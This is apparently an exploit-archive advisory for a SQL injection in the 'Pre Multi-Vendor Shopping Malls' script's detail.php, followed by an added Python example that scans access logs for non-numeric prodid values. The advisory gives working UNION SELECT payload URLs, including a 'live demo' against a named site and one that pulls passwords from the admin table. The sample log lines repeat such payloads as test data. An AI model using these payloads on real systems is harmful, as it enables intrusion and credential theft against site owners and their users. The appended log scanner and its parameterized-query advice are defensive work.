Pre Multi-Vendor Shopping Malls suffers from a remote SQL injection vulnerability in detail.php.
Pre Multi-Vendor Shopping Malls [id] Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
----------------------------------------------------------------
script : Pre Multi-Vendor Shopping Malls
script : http://www.preprojects.com/pclphp.asp
Risk : High
----------------------------------------------------------------
Discovered by : d3b4g
email : bl4ckend[at]gmail[dot]com
Site : www.bl4ck3nd.info
----------------------------------------------------------------
Exploit : http://target.com/[path]/detail.php?prodid=-1+union+all+select+1,2,3,concat(@@version),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
Live demo: http://preproject.com/prebay/detail.php?prodid=-1+union+all+select+1,2,3,concat(@@version),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*
For admin : http://preproject.com/prebay/detail.php?prodid=-1+union+all+select+1,2,3,concat(password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+admin/*
# Rest find =P
----------------------------------------------------------------
----------------------------------------------------------------
Greetz: str0ke, Hotlism.org, All my friends
-----------------------------------------------------------------
Proud to be a Maldivian :))
=======================
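
Added example (not part of the original advisory, and not the vendor's code): prodid is expected to be a numeric product id, so a defender can review web server access logs for detail.php requests whose prodid is anything other than a plain integer. The log lines, paths, client addresses and the 10-digit limit are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines; addresses and paths are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /shop/detail.php?prodid=42 HTTP/1.1" 200 5120
192.0.2.77 - - [01/Jan/2024:10:00:05 +0000] "GET /shop/detail.php?prodid=-1+union+all+select+1,2,3,concat(@@version),5/* HTTP/1.1" 200 4801
192.0.2.77 - - [01/Jan/2024:10:00:09 +0000] "GET /shop/detail.php?prodid=-1%20UNION%20ALL%20SELECT%201,2,3 HTTP/1.1" 200 4790
192.0.2.10 - - [01/Jan/2024:10:00:12 +0000] "GET /shop/index.php?page=2 HTTP/1.1" 200 900
192.0.2.31 - - [01/Jan/2024:10:00:20 +0000] "GET /shop/detail.php?prodid=7&prodid=8%27 HTTP/1.1" 500 310
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Allow-list: a product id is 1-10 ASCII digits (length limit is an assumption).
PRODID_RE = re.compile(r"[0-9]{1,10}")


def is_valid_prodid(value):
    """True only for a plain non-negative integer string."""
    return bool(PRODID_RE.fullmatch(value))


def suspicious_requests(log_text, script="detail.php", param="prodid"):
    """Return requests to `script` whose `param` is missing, repeated or non-numeric.

    Values are URL-decoded first, so '+', '%20' and upper/lower-case variants
    are all caught by the same allow-list instead of a keyword blacklist.
    """
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/" + script):
            continue
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        if len(values) != 1 or not is_valid_prodid(values[0]):
            findings.append({
                "client": line.split()[0],
                "status": int(m.group("status")),
                "values": values,
            })
    return findings


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit["client"], hit["status"], hit["values"])
```

The same integer allow-list, applied in detail.php before the value reaches the query and combined with a parameterized statement, closes the injection itself.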